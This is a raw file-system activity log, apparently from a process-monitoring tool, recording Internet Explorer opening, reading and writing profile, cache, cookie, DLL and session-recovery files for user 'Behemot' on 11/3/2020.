11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Adobe\Flash Player\NativeCache
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Adobe\Flash Player\NativeCache
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Tracking Protection
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Tracking Protection
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Feeds
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Feeds
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\TabRoaming
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\TabRoaming
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\TabRoaming
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\TabRoaming
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\TabRoaming
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\PlayReady
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\PlayReady
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\PrivacIE
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\PrivacIE
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\PrivacIE
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\PrivacIE\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\PrivacIE\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\PrivacIE\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\PrivacIE\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\PrivacIE\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\DNTException
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\DNTException
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\DNTException
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\DNTException\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\DNTException\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\DNTException\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\DNTException\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\DNTException\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatCache
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatCache
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatCache
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatCache\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatCache\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatCache\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatCache\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatCache\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatUACache
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatUACache
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatUACache
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\Low
11/3/2020 - 11:45:45.450Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\Low
11/3/2020 - 11:45:45.450Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\Low
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:45.465Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5
11/3/2020 - 11:45:45.465Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\rasadhlp.dll
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rasadhlp.dll
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rasadhlp.dll
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\FWPUCLNT.DLL
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\FWPUCLNT.DLL
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\NETAPI32.dll
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netapi32.dll
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netapi32.dll
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\netutils.dll
11/3/2020 - 11:45:45.528Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netutils.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netutils.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\srvcli.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\srvcli.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\srvcli.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\wkscli.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wkscli.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wkscli.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\IEUI.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieui.dll
11/3/2020 - 11:45:45.543Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieui.dll
11/3/2020 - 11:45:45.606Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:45.606Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:45.653Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:45.653Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:45.653Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:45.653Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:45.653Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
